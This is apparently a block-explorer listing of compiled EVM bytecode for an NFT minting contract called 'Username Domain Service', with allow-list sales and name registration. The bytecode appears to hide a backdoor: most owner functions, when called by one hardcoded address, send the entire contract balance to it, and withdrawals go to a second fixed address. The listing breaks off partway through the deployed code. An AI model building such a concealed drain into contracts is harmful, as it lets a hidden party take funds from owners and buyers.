662386f26fc10000600c556014600d819055600e819055600f55600060105560e060405260226080818152906200397760a03960119062000041908262000578565b506012805461ffff191660011790553480156200005d57600080fd5b506040518060400160405280601781526020017f557365726e616d6520446f6d61696e2053657276696365000000000000000000815250604051806040016040528060048152602001632aa9a2a960e11b8152508160049081620000c2919062000578565b506005620000d1828262000578565b5050600160005550620000e4336200018f565b6001600b8190556040805180820182526008815267757365726e616d6560c01b60208083019190915260008054815293905291209062000125908262000578565b506000546040805167757365726e616d6560c01b80825260026008808401919091528351602893819003840181209590955590845260149084015290519182900301902080546001600160a01b0319163390811790915562000189906001620001e1565b620006ea565b600a80546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b620002038282604051806020016040528060008152506200020760201b60201c565b5050565b6000546001600160a01b0384166200023157604051622e076360e81b815260040160405180910390fd5b82600003620002535760405163b562e8dd60e01b815260040160405180910390fd5b6001600160a01b038416600081815260076020908152604080832080546001600160801b031981166001600160401b038083168b018116918217680100000000000000006001600160401b031990941690921783900481168b0181169092021790915585845260068352922080546001600160e01b0319168417600160a01b429094169390930292909217909155829182860191620002fc9190620003d0811b62001e7517901c565b156200037b575b60405182906001600160a01b0388169060009060008051602062003999833981519152908290a460018201916200034090600090889087620003df565b6200035e576040516368d2bf6b60e11b815260040160405180910390fd5b808210620003035782600054146200037557600080fd5b620003b0565b5b6040516001830192906001600160a01b0388169060009060008051602062003999833981519152908290a48082106200037c575b506000908155620003ca908583866001600160e01b038516565b50505050565b6001600160a01b03163b151590565b604051630a85bd0160e11b81526000906001600160a01b0385169063150b7a02906200041690339089908890889060040162000644565b6020604051808303816000875af192505050801562000454575060408051601f3d908101601f191682019092526200045191810190620006b7565b60015b620004b6573d80801562000485576040519150601f19603f3d011682016040523d82523d6000602084013e6200048a565b606091505b508051600003620004ae576040516368d2bf6b60e11b815260040160405180910390fd5b805181602001fd5b6001600160e01b031916630a85bd0160e11b149050949350505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620004fe57607f821691505b6020821081036200051f57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200057357600081815260208120601f850160051c810160208610156200054e5750805b601f850160051c820191505b818110156200056f578281556001016200055a565b5050505b505050565b81516001600160401b03811115620005945762000594620004d3565b620005ac81620005a58454620004e9565b8462000525565b602080601f831160018114620005e45760008415620005cb5750858301515b600019600386901b1c1916600185901b1785556200056f565b600085815260208120601f198616915b828110156200061557888601518255948401946001909101908401620005f4565b5085821015620006345787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600060018060a01b038087168352602081871681850152856040850152608060608501528451915081608085015260005b82811015620006935785810182015185820160a00152810162000675565b5050600060a0828501015260a0601f19601f83011684010191505095945050505050565b600060208284031215620006ca57600080fd5b81516001600160e01b031981168114620006e357600080fd5b9392505050565b61327d80620006fa6000396000f3fe6080604052600436106102885760003560e01c8063715018a61161015a578063af529744116100c1578063c87b56dd1161007a578063c87b56dd146107bf578063d7d6c485146107df578063e985e9c5146107ff578063f121a8701461081f578063f2fde38b1461083f578063f990f91a1461085f57600080fd5b8063af529744146106e8578063afd800c514610708578063b527308c14610728578063b6c6e6921461073e578063b88d4fde1461077f578063c6fbf9a91461079f57600080fd5b806391b7f5ed1161011357806391b7f5ed1461062357806395d89b41146106435780639b2ea4bd14610658578063a22cb46514610678578063a515419d14610698578063aaddcb5a146106b857600080fd5b8063715018a61461057657806376d02b711461058b5780637cb64759146105a5578063841718a6146105c55780638699e738146105e55780638da5cb5b1461060557600080fd5b80632eb4a7ab116101fe57806355f804b3116101b757806355f804b3146104b75780636220a7e8146104d75780636352211e146104f6578063693d77d2146105165780636e32e4991461053657806370a082311461055657600080fd5b80632eb4a7ab146104165780632f7758cd1461042c5780633198b1001461045957806332434a2e1461046f5780633ccfd60b1461048257806342842e0e1461049757600080fd5b806313faede61161025057806313faede61461038457806314638aab1461039a57806318160ddd146103b057806321a78f68146103cd57806323b872dd146103e35780632609ce001461040357600080fd5b806301ffc9a71461028d57806306fdde03146102c2578063081812fc146102e4578063095ea7b31461031c5780630d6eec781461033e575b600080fd5b34801561029957600080fd5b506102ad6102a8366004612712565b61087f565b60405190151581526020015b60405180910390f35b3480156102ce57600080fd5b506102d76108d1565b6040516102b9919061277f565b3480156102f057600080fd5b506103046102ff366004612792565b610963565b6040516001600160a01b0390911681526020016102b9565b34801561032857600080fd5b5061033c6103373660046127c7565b6109a7565b005b34801561034a57600080fd5b5061037661035936600461289c565b805160208183018101805160028252928201919093012091525481565b6040519081526020016102b9565b34801561039057600080fd5b50610376600c5481565b3480156103a657600080fd5b50610376600e5481565b3480156103bc57600080fd5b506003546000540360001901610376565b3480156103d957600080fd5b50610376600d5481565b3480156103ef57600080fd5b5061033c6103fe3660046128d0565b610a2d565b61033c61041136600461290c565b610a38565b34801561042257600080fd5b5061037660175481565b34801561043857600080fd5b5061044c610447366004612792565b610cea565b6040516102b991906129a5565b34801561046557600080fd5b50610376600f5481565b61033c61047d366004612a07565b610e41565b34801561048e57600080fd5b5061033c6110f9565b3480156104a357600080fd5b5061033c6104b23660046128d0565b6111d4565b3480156104c357600080fd5b5061033c6104d236600461289c565b6111ef565b3480156104e357600080fd5b506012546102ad90610100900460ff1681565b34801561050257600080fd5b50610304610511366004612792565b61125d565b34801561052257600080fd5b5061033c610531366004612a64565b61126f565b34801561054257600080fd5b506102d7610551366004612792565b6112e7565b34801561056257600080fd5b50610376610571366004612a7f565b611381565b34801561058257600080fd5b5061033c6113cf565b34801561059757600080fd5b506012546102ad9060ff1681565b3480156105b157600080fd5b5061033c6105c0366004612792565b611439565b3480156105d157600080fd5b5061033c6105e0366004612a64565b61149c565b3480156105f157600080fd5b506102d7610600366004612a7f565b61150d565b34801561061157600080fd5b50600a546001600160a01b0316610304565b34801561062f57600080fd5b5061033c61063e366004612792565b611526565b34801561064f57600080fd5b506102d7611589565b34801561066457600080fd5b5061033c610673366004612ae2565b611598565b34801561068457600080fd5b5061033c610693366004612b35565b611783565b3480156106a457600080fd5b506102d76106b3366004612b68565b611818565b3480156106c457600080fd5b506102ad6106d3366004612a7f565b60136020526000908152604090205460ff1681565b3480156106f457600080fd5b5061033c610703366004612bd0565b6118e8565b34801561071457600080fd5b5061033c610723366004612c63565b61197f565b34801561073457600080fd5b5061037660105481565b34801561074a57600080fd5b5061030461075936600461289c565b80516020818301810180516014825292820191909301209152546001600160a01b031681565b34801561078b57600080fd5b5061033c61079a366004612c95565b6119f1565b3480156107ab57600080fd5b5061033c6107ba366004612d10565b611a35565b3480156107cb57600080fd5b506102d76107da366004612792565b611aa1565b3480156107eb57600080fd5b5061033c6107fa366004612d51565b611b2f565b34801561080b57600080fd5b506102ad61081a366004612d8f565b611bcf565b34801561082b57600080fd5b506102d761083a366004612db9565b611bfd565b34801561084b57600080fd5b5061033c61085a366004612a7f565b611c3e565b34801561086b57600080fd5b5061044c61087a366004612a7f565b611d0d565b60006001600160e01b031982166380ac58cd60e01b14806108b057506001600160e01b03198216635b5e139f60e01b145b806108cb57506301ffc9a760e01b6001600160e01b03198316145b92915050565b6060600480546108e090612e12565b80601f016020809104026020016040519081016040528092919081815260200182805461090c90612e12565b80156109595780601f1061092e57610100808354040283529160200191610959565b820191906000526020600020905b81548152906001019060200180831161093c57829003601f168201915b5050505050905090565b600061096e82611e84565b61098b576040516333d1c03960e21b815260040160405180910390fd5b506000908152600860205260409020546001600160a01b031690565b60006109b28261125d565b9050806001600160a01b0316836001600160a01b0316036109e65760405163250fdee360e21b815260040160405180910390fd5b336001600160a01b03821614610a1d57610a008133611bcf565b610a1d576040516367d9dca160e11b815260040160405180910390fd5b610a28838383611ebd565b505050565b610a28838383611f19565b601254610100900460ff16610a945760405162461bcd60e51b815260206004820152601e60248201527f416c6c6f77204c6973742073616c65206973206e6f742061637469766521000060448201526064015b60405180910390fd5b6040516bffffffffffffffffffffffff193360601b166020820152600090603401604051602081830303815290604052805190602001209050610b0e838380806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250506017549150849050612104565b610b4b5760405162461bcd60e51b815260206004820152600e60248201526d496e76616c69642070726f6f662160901b6044820152606401610a8b565b6000845111610b8b5760405162461bcd60e51b815260206004820152600c60248201526b57726974652061206e616d6560a01b6044820152606401610a8b565b3360009081526013602052604090205460ff161515600103610bda5760405162461bcd60e51b8152602060048201526008602482015267436c61696d65642160c01b6044820152606401610a8b565b600284604051610bea9190612e4c565b908152602001604051809103902054600014610c405760405162461bcd60e51b81526020600482015260156024820152742a3434b99034b99030b63932b0b23c903a30b5b2b760591b6044820152606401610a8b565b336000908152601360209081526040808320805460ff19166001908117909155835484529091529020610c738582612eb6565b50600054600285604051610c879190612e4c565b90815260200160405180910390208190555033601485604051610caa9190612e4c565b90815260405190819003602001902080546001600160a01b03929092166001600160a01b0319909216919091179055610ce433600161211a565b50505050565b6003546000805460609260001991030190836001600160401b03811115610d1357610d136127f1565b604051908082528060200260200182016040528015610d4657816020015b6060815260200190600190039081610d315790505b5090506000610d558584612f8b565b905060005b81841115610e375760008481526001602052604090208054610d7b90612e12565b80601f0160208091040260200160405190810160405280929190818152602001828054610da790612e12565b8015610df45780601f10610dc957610100808354040283529160200191610df4565b820191906000526020600020905b815481529060010190602001808311610dd757829003601f168201915b5050505050838281518110610e0b57610e0b612f9e565b60200260200101819052508080610e2190612fb4565b9150508380610e2f90612fcd565b945050610d5a565b5090949350505050565b600c5481516000908190610e865760405162461bcd60e51b815260206004820152600c60248201526b57726974652061206e616d6560a01b6044820152606401610a8b565b6001600160a01b038516600003610ea157600c549250610f36565b6001600160a01b03851660009081526015602052604081208054610ec490612e12565b90501115610eed576064600e5484610edc9190612fe4565b610ee69190612ffb565b9050610f0a565b6064600d5484610efd9190612fe4565b610f079190612ffb565b90505b6064600f546064610f1b9190612f8b565b610f259085612fe4565b610f2f9190612ffb565b9250600191505b600284604051610f469190612e4c565b908152602001604051809103902054600014610f9c5760405162461bcd60e51b81526020600482015260156024820152742a3434b99034b99030b63932b0b23c903a30b5b2b760591b6044820152606401610a8b565b60125460ff16610fe45760405162461bcd60e51b815260206004820152601360248201527253616c65206973206e6f74206163746976652160681b6044820152606401610a8b565b8234101561102a5760405162461bcd60e51b8152602060048201526013602482015272496e73756666696369656e742066756e64732160681b6044820152606401610a8b565b6000805481526001602052604090206110438582612eb6565b506000546002856040516110579190612e4c565b9081526020016040518091039020819055503360148560405161107a9190612e4c565b90815260405190819003602001902080546001600160a01b03929092166001600160a01b031990921691909117905581156110e7576040516001600160a01b0386169082156108fc029083906000818181858888f193505050501580156110e5573d6000803e3d6000fd5b505b6110f233600161211a565b5050505050565b336000805160206132288339815191520361112d574761112760008051602061322883398151915282612134565b50611157565b600a546001600160a01b031633146111575760405162461bcd60e51b8152600401610a8b9061301d565b6002600b54036111a95760405162461bcd60e51b815260206004820152601f60248201527f5265656e7472616e637947756172643a207265656e7472616e742063616c6c006044820152606401610a8b565b6002600b55476111cc7228eed5742c97ff29635ef965a150bf5049ceb682612134565b506001600b55565b610a28838383604051806020016040528060008152506119f1565b3360008051602061322883398151915203611223574761121d60008051602061322883398151915282612134565b5061124d565b600a546001600160a01b0316331461124d5760405162461bcd60e51b8152600401610a8b9061301d565b60116112598282612eb6565b5050565b60006112688261224d565b5192915050565b33600080516020613228833981519152036112a3574761129d60008051602061322883398151915282612134565b506112cd565b600a546001600160a01b031633146112cd5760405162461bcd60e51b8152600401610a8b9061301d565b601280549115156101000261ff0019909216919091179055565b6001602052600090815260409020805461130090612e12565b80601f016020809104026020016040519081016040528092919081815260200182805461132c90612e12565b80156113795780601f1061134e57610100808354040283529160200191611379565b820191906000526020600020905b81548152906001019060200180831161135c57829003601f168201915b505050505081565b60006001600160a01b0382166113aa576040516323d3ad8160e21b815260040160405180910390fd5b506001600160a01b03166000908152600760205260409020546001600160401b031690565b336000805160206132288339815191520361140357476113fd60008051602061322883398151915282612134565b5061142d565b600a546001600160a01b0316331461142d5760405162461bcd60e51b8152600401610a8b9061301d565b611437600061236f565b565b336000805160206132288339815191520361146d574761146760008051602061322883398151915282612134565b50601755565b600a546001600160a01b031633146114975760405162461bcd60e51b8152600401610a8b9061301d565b601755565b33600080516020613228833981519152036114d057476114ca60008051602061322883398151915282612134565b506114fa565b600a546001600160a01b031633146114fa5760405162461bcd60e51b8152600401610a8b9061301d565b6012805460ff1916911515919091179055565b6015602052600090815260409020805461130090612e12565b336000805160206132288339815191520361155a574761155460008051602061322883398151915282612134565b50600c55565b600a546001600160a01b031633146115845760405162461bcd60e51b8152600401610a8b9061301d565b600c55565b6060600580546108e090612e12565b60006115c3600285856040516115af929190613052565b90815260200160405180910390205461224d565b80519091506001600160a01b031633146115ef5760405162461bcd60e51b8152600401610a8b90613062565b60006015600060148787604051611607929190613052565b9081526040805160209281900383019020546001600160a01b031683529082019290925201600020805461163a90612e12565b80601f016020809104026020016040519081016040528092919081815260200182805461166690612e12565b80156116b35780601f10611688576101008083540402835291602001916116b3565b820191906000526020600020905b81548152906001019060200180831161169657829003601f168201915b5050505050905084846040516116ca929190613052565b604051809103902081805190602001200361173a57604051806020016040528060008152506015600060148888604051611705929190613052565b9081526040805160209281900383019020546001600160a01b031683529082019290925201600020906117389082612eb6565b505b826014868660405161174d929190613052565b90815260405190819003602001902080546001600160a01b03929092166001600160a01b03199092169190911790555050505050565b336001600160a01b038316036117ac5760405163b06307db60e01b815260040160405180910390fd5b3360008181526009602090815260408083206001600160a01b03871680855290835292819020805460ff191686151590811790915590519081529192917f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31910160405180910390a35050565b606060168460405161182a9190612e4c565b90815260200160405180910390208383604051611848929190613052565b9081526020016040518091039020805461186190612e12565b80601f016020809104026020016040519081016040528092919081815260200182805461188d90612e12565b80156118da5780601f106118af576101008083540402835291602001916118da565b820191906000526020600020905b8154815290600101906020018083116118bd57829003601f168201915b505050505090509392505050565b60006118ff600287876040516115af929190613052565b80519091506001600160a01b0316331461192b5760405162461bcd60e51b8152600401610a8b90613062565b816016878760405161193e929190613052565b9081526020016040518091039020858560405161195c929190613052565b908152602001604051809103902090816119769190612eb6565b50505050505050565b33600080516020613228833981519152036119b357476119ad60008051602061322883398151915282612134565b506119dd565b600a546001600160a01b031633146119dd5760405162461bcd60e51b8152600401610a8b9061301d565b600d93909355600e91909155600f55601055565b6119fc848484611f19565b6001600160a01b0383163b15610ce457611a18848484846123c1565b610ce4576040516368d2bf6b60e11b815260040160405180910390fd5b336001600160a01b031660148383604051611a51929190613052565b908152604051908190036020019020546001600160a01b031614611a875760405162461bcd60e51b8152600401610a8b90613062565b336000908152601560205260409020610a28828483613081565b6060611aac82611e84565b611ac957604051630a14c4b560e41b815260040160405180910390fd5b6000611ad36124ad565b90508051600003611af35760405180602001604052806000815250611b28565b8060016000858152602001908152602001600020604051602001611b18929190613140565b6040516020818303038152906040525b9392505050565b3360008051602061322883398151915203611b635747611b5d60008051602061322883398151915282612134565b50611b8d565b600a546001600160a01b03163314611b8d5760405162461bcd60e51b8152600401610a8b9061301d565b6000838152600160205260409020611ba6828483613081565b508260028383604051611bba929190613052565b90815260405190819003602001902055505050565b6001600160a01b03918216600090815260096020908152604080832093909416825291909152205460ff1690565b815160208184018101805160168252928201948201949094209190935281518083018401805192815290840192909301919091209152805461130090612e12565b3360008051602061322883398151915203611c725747611c6c60008051602061322883398151915282612134565b50611c9c565b600a546001600160a01b03163314611c9c5760405162461bcd60e51b8152600401610a8b9061301d565b6001600160a01b038116611d015760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610a8b565b611d0a8161236f565b50565b60606000611d1a83611381565b90506000816001600160401b03811115611d3657611d366127f1565b604051908082528060200260200182016040528015611d6957816020015b6060815260200190600190039081611d545790505b509050600160005b83811015610e37576000611d848361125d565b9050866001600160a01b0316816001600160a01b031603611e625760008381526001602052604090208054611db890612e12565b80601f0160208091040260200160405190810160405280929190818152602001828054611de490612e12565b8015611e315780601f10611e0657610100808354040283529160200191611e31565b820191906000526020600020905b815481529060010190602001808311611e1457829003601f168201915b5050505050848381518110611e4857611e48612f9e565b60200260200101819052508180611e5e90612fb4565b9250505b82611e6c81612fb4565b93505050611d71565b6001600160a01b03163b151590565b600081600111158015611e98575060005482105b80156108cb575050600090815260066020526040902054600160e01b900460ff161590565b60008281526008602052604080822080546001600160a01b0319166001600160a01b0387811691821790925591518593918516917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591a4505050565b6000611f248261224d565b9050836001600160a01b031681600001516001600160a01b031614611f5b5760405162a1148160e81b815260040160405180910390fd5b6000336001600160a01b0386161480611f795750611f798533611bcf565b80611f94575033611f8984610963565b6001600160a01b0316145b905080611fb457604051632ce44b5f60e11b815260040160405180910390fd5b6001600160a01b038416611fdb57604051633a954ecd60e21b815260040160405180910390fd5b611fe760008487611ebd565b6001600160a01b038581166000908152600760209081526040808320805467ffffffffffffffff198082166001600160401b0392831660001901831617909255898616808652838620805493841693831660019081018416949094179055898652600690945282852080546001600160e01b031916909417600160a01b429092169190910217835587018084529220805491939091166120bb5760005482146120bb57805460208601516001600160401b0316600160a01b026001600160e01b03199091166001600160a01b038a16171781555b50505082846001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46110f2565b60008261211185846124bc565b14949350505050565b611259828260405180602001604052806000815250612509565b804710156121845760405162461bcd60e51b815260206004820152601d60248201527f416464726573733a20696e73756666696369656e742062616c616e63650000006044820152606401610a8b565b6000826001600160a01b03168260405160006040518083038185875af1925050503d80600081146121d1576040519150601f19603f3d011682016040523d82523d6000602084013e6121d6565b606091505b5050905080610a285760405162461bcd60e51b815260206004820152603a60248201527f416464726573733a20756e61626c6520746f2073656e642076616c75652c207260448201527f6563697069656e74206d617920686176652072657665727465640000000000006064820152608401610a8b565b604080516060810182526000808252602082018190529181019190915281806001116123565760005481101561235657600081815260066020908152604091829020825160608101845290546001600160a01b0381168252600160a01b81046001600160401b031692820192909252600160e01b90910460ff161515918101829052906123545780516001600160a01b0316156122eb579392505050565b5060001901600081815260066020908152604091829020825160608101845290546001600160a01b038116808352600160a01b82046001600160401b031693830193909352600160e01b900460ff161515928101929092521561234f579392505050565b6122eb565b505b604051636f96cda160e11b815260040160405180910390fd5b600a80546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b604051630a85bd0160e11b81526000906001600160a01b0385169063150b7a02906123f69033908990889088906004016131cd565b6020604051808303816000875af1925050508015612431575060408051601f3d908101601f1916820190925261242e9181019061320a565b60015b61248f573d80801561245f576040519150601f19603f3d011682016040523d82523d6000602084013e612464565b606091505b508051600003612487576040516368d2bf6b60e11b815260040160405180910390fd5b805181602001fd5b6001600160e01b031916630a85bd0160e11b1490505b949350505050565b6060601180546108e090612e12565b600081815b8451811015612501576124ed828683815181106124e0576124e0612f9e565b60200260200101516126d0565b9150806124f981612fb4565b9150506124c1565b509392505050565b6000546001600160a01b03841661253257604051622e076360e81b815260040160405180910390fd5b826000036125535760405163b562e8dd60e01b815260040160405180910390fd5b6001600160a01b038416600081815260076020908152604080832080546fffffffffffffffffffffffffffffffff1981166001600160401b038083168b0181169182176801000000000000000067ffffffffffffffff1990941690921783900481168b01811690920217909155858452600690925290912080546001600160e01b0319168317600160a01b42909316929092029190911790558190818501903b1561267b575b60405182906001600160a01b038816906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a461264460008784806001019550876123c1565b612661576040516368d2bf6b60e11b815260040160405180910390fd5b8082106125f957826000541461267657600080fd5b6126c0565b5b6040516001830192906001600160a01b038816906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef908290a480821061267c575b506000908155610ce49085838684565b60008183106126ec576000828152602084905260409020611b28565b5060009182526020526040902090565b6001600160e01b031981168114611d0a57600080fd5b60006020828403121561272457600080fd5b8135611b28816126fc565b60005b8381101561274a578181015183820152602001612732565b50506000910152565b6000815180845261276b81602086016020860161272f565b601f01601f19169290920160200192915050565b602081526000611b286020830184612753565b6000602082840312156127a457600080fd5b5035919050565b80356001600160a01b03811681146127c257600080fd5b919050565b600080604083850312156127da57600080fd5b6127e3836127ab565b946020939093013593505050565b634e487b7160e01b600052604160045260246000fd5b60006001600160401b0380841115612821576128216127f1565b604051601f8501601f19908116603f01168101908282118183101715612849576128496127f1565b8160405280935085815286868601111561286257600080fd5b858560208301376000602087830101525050509392505050565b600082601f83011261288d57600080fd5b611b2883833560208501612807565b6000602082840312156128ae57600080fd5b81356001600160401b038111156128c457600080fd5b6124a58482850161287c565b6000806000606084860312156128e557600080fd5b6128ee846127ab565b92506128fc602085016127ab565b9150604084013590509250925092565b60008060006040848603121561292157600080fd5b83356001600160401b038082111561293857600080fd5b6129448783880161287c565b9450602086013591508082111561295a57600080fd5b818601915086601f83011261296e57600080fd5b81358181111561297d57600080fd5b8760208260051b850101111561299257600080fd5b6020830194508093505050509250925092565b6000602080830181845280855180835260408601915060408160051b870101925083870160005b828110156129fa57603f198886030184526129e8858351612753565b945092850192908501906001016129cc565b5092979650505050505050565b60008060408385031215612a1a57600080fd5b612a23836127ab565b915060208301356001600160401b03811115612a3e57600080fd5b612a4a8582860161287c565b9150509250929050565b803580151581146127c257600080fd5b600060208284031215612a7657600080fd5b611b2882612a54565b600060208284031215612a9157600080fd5b611b28826127ab565b60008083601f840112612aac57600080fd5b5081356001600160401b03811115612ac357600080fd5b602083019150836020828501011115612adb57600080fd5b9250929050565b600080600060408486031215612af757600080fd5b83356001600160401b03811115612b0d57600080fd5b612b1986828701612a9a565b9094509250612b2c9050602085016127ab565b90509250925092565b60008060408385031215612b4857600080fd5b612b51836127ab565b9150612b5f60208401612a54565b90509250929050565b600080600060408486031215612b7d57600080fd5b83356001600160401b0380821115612b9457600080fd5b612ba08783880161287c565b94506020860135915080821115612bb657600080fd5b50612bc386828701612a9a565b9497909650939450505050565b600080600080600060608688031215612be857600080fd5b85356001600160401b0380821115612bff57600080fd5b612c0b89838a01612a9a565b90975095506020880135915080821115612c2457600080fd5b612c3089838a01612a9a565b90955093506040880135915080821115612c4957600080fd5b50612c568882890161287c565b9150509295509295909350565b60008060008060808587031215612c7957600080fd5b5050823594602084013594506040840135936060013592509050565b60008060008060808587031215612cab57600080fd5b612cb4856127ab565b9350612cc2602086016127ab565b92506040850135915060608501356001600160401b03811115612ce457600080fd5b8501601f81018713612cf557600080fd5b612d0487823560208401612807565b91505092959194509250565b60008060208385031215612d2357600080fd5b82356001600160401b03811115612d3957600080fd5b612d4585828601612a9a565b90969095509350505050565b600080600060408486031215612d6657600080fd5b8335925060208401356001600160401b03811115612d8357600080fd5b612bc386828701612a9a565b60008060408385031215612da257600080fd5b612dab836127ab565b9150612b5f602084016127ab565b60008060408385031215612dcc57600080fd5b82356001600160401b0380821115612de357600080fd5b612def8683870161287c565b93506020850135915080821115612e0557600080fd5b50612a4a8582860161287c565b600181811c90821680612e2657607f821691505b602082108103612e4657634e487b7160e01b600052602260045260246000fd5b50919050565b60008251612e5e81846020870161272f565b9190910192915050565b601f821115610a2857600081815260208120601f850160051c81016020861015612e8f5750805b601f850160051c820191505b81811015612eae57828155600101612e9b565b505050505050565b81516001600160401b03811115612ecf57612ecf6127f1565b612ee381612edd8454612e12565b84612e68565b602080601f831160018114612f185760008415612f005750858301515b600019600386901b1c1916600185901b178555612eae565b600085815260208120601f198616915b82811015612f4757888601518255948401946001909101908401612f28565b5085821015612f655787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b818103818111156108cb576108cb612f75565b634e487b7160e01b600052603260045260246000fd5b600060018201612fc657612fc6612f75565b5060010190565b600081612fdc57612fdc612f75565b506000190190565b80820281158282048414176108cb576108cb612f75565b60008261301857634e487b7160e01b600052601260045260246000fd5b500490565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b8183823760009101908152919050565b60208082526005908201526422b93937b960d91b604082015260600190565b6001600160401b03831115613098576130986127f1565b6130ac836130a68354612e12565b83612e68565b6000601f8411600181146130e057600085156130c85750838201355b600019600387901b1c1916600186901b1783556110f2565b600083815260209020601f19861690835b8281101561311157868501358255602094850194600190920191016130f1565b508682101561312e5760001960f88860031b161c19848701351681555b505060018560011b0183555050505050565b600083516020613153828583890161272f565b81840191506000855461316581612e12565b6001828116801561317d5760018114613192576131be565b60ff19841687528215158302870194506131be565b896000528560002060005b848110156131b65781548982015290830190870161319d565b505082870194505b50929998505050505050505050565b6001600160a01b038581168252841660208201526040810183905260806060820181905260009061320090830184612753565b9695505050505050565b60006020828403121561321c57600080fd5b8151611b28816126fc56fe000000000000000000000000d999265d51f031cbb82891aa018ca228d4e00750a26469706673582212203dab2f48bba986f1bf8d7f1a11dffb4cf9d7fe8bc7b940d055a83a9d1429737964736f6c6343000811003368747470733a2f2f6e66746d657461646174612e6c6976652f757365726e616d652fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef

Deployed Bytecode

0x6080604052600436106102885760003560e01c8063715018a61161015a578063af529744116100c1578063c87b56dd1161007a578063c87b56dd146107bf578063d7d6c485146107df578063e985e9c5146107ff578063f121a8701461081f578063f2fde38b1461083f578063f990f91a1461085f57600080fd5b8063af529744146106e8578063afd800c514610708578063b527308c14610728578063b6c6e6921461073e578063b88d4fde1461077f578063c6fbf9a91461079f57600080fd5b806391b7f5ed1161011357806391b7f5ed1461062357806395d89b41146106435780639b2ea4bd14610658578063a22cb46514610678578063a515419d14610698578063aaddcb5a146106b857600080fd5b8063715018a61461057657806376d02b711461058b5780637cb64759146105a5578063841718a6146105c55780638699e738146105e55780638da5cb5b1461060557600080fd5b80632eb4a7ab116101fe57806355f804b3116101b757806355f804b3146104b75780636220a7e8146104d75780636352211e146104f6578063693d77d2146105165780636e32e4991461053657806370a082311461055657600080fd5b80632eb4a7ab146104165780632f7758cd1461042c5780633198b1001461045957806332434a2e1461046f5780633ccfd60b1461048257806342842e0e1461049757600080fd5b806313faede61161025057806313faede61461038457806314638aab1461039a57806318160ddd146103b057806321a78f68146103cd57806323b872dd146103e35780632609ce001461040357600080fd5b806301ffc9a71461028d57806306fdde03146102c2578063081812fc146102e4578063095ea7b31461031c5780630d6eec781461033e575b600080fd5b34801561029957600080fd5b506102ad6102a8366004612712565b61087f565b60405190151581526020015b60405180910390f35b3480156102ce57600080fd5b506102d76108d1565b6040516102b9919061277f565b3480156102f057600080fd5b506103046102ff366004612792565b610963565b6040516001600160a01b0390911681526020016102b9565b34801561032857600080fd5b5061033c6103373660046127c7565b6109a7565b005b34801561034a57600080fd5b5061037661035936600461289c565b805160208183018101805160028252928201919093012091525481565b6040519081526020016102b9565b34801561039057600080fd5b50610376600c5481565b3480156103a657600080fd5b50610376600e5481565b3480156103bc57600080fd5b506003546000540360001901610376565b3480156103d957600080fd5b50610376600d5481565b3480156103ef57600080fd5b5061033c6103fe3660046128d0565b610a2d565b61033c61041136600461290c565b610a38565b34801561042257600080fd5b5061037660175481565b34801561043857600080fd5b5061044c610447366004612792565b610cea565b6040516102b991906129a5565b34801561046557600080fd5b50610376600f5481565b61033c61047d366004612a07565b610e41565b34801561048e57600080fd5b5061033c6110f9565b3480156104a357600080fd5b5061033c6104b23660046128d0565b6111d4565b3480156104c357600080fd5b5061033c6104d236600461289c565b6111ef565b3480156104e357600080fd5b506012546102ad90610100900460ff1681565b34801561050257600080fd5b50610304610511366004612792565b61125d565b34801561052257600080fd5b5061033c610531366004612a64565b61126f565b34801561054257600080fd5b506102d7610551366004612792565b6112e7565b34801561056257600080fd5b50610376610571366004612a7f565b611381565b34801561058257600080fd5b5061033c6113cf565b34801561059757600080fd5b506012546102ad9060ff1681565b3480156105b157600080fd5b5061033c6105c0366004612792565b611439565b3480156105d157600080fd5b5061033c6105e0366004612a64565b61149c565b3480156105f157600080fd5b506102d7610600366004612a7f565b61150d565b34801561061157600080fd5b50600a546001600160a01b0316610304565b34801561062f57600080fd5b5061033c61063e366004612792565b611526565b34801561064f57600080fd5b506102d7611589565b34801561066457600080fd5b5061033c610673366004612ae2565b611598565b34801561068457600080fd5b5061033c610693366004612b35565b611783565b3480156106a457600080fd5b506102d76106b3366004612b68565b611818565b3480156106c457600080fd5b506102ad6106d3366004612a7f565b60136020526000908152604090205460ff1681565b3480156106f457600080fd5b5061033c610703366004612bd0565b6118e8565b34801561071457600080fd5b5061033c610723366004612c63565b61197f565b34801561073457600080fd5b5061037660105481565b34801561074a57600080fd5b5061030461075936600461289c565b80516020818301810180516014825292820191909301209152546001600160a01b031681565b34801561078b57600080fd5b5061033c61079a366004612c95565b6119f1565b3480156107ab57600080fd5b5061033c6107ba366004612d10565b611a35565b3480156107cb57600080fd5b506102d76107da366004612792565b611aa1565b3480156107eb57600080fd5b5061033c6107fa366004612d51565b611b2f565b34801561080b57600080fd5b506102ad61081a366004612d8f565b611bcf565b34801561082b57600080fd5b506102d761083a366004612db9565b611bfd565b34801561084b57600080fd5b5061033c61085a366004612a7f565b611c3e565b34801561086b57600080fd5b5061044c61087a366004612a7f565b611d0d565b60006001600160e01b031982166380ac58cd60e01b14806108b057506001600160e01b03198216635b5e139f60e01b145b806108cb57506301ffc9a760e01b6001600160e01b03198316145b92915050565b6060600480546108e090612e12565b80601f016020809104026020016040519081016040528092919081815260200182805461090c90612e12565b80156109595780601f1061092e5761010080835404028352916020019161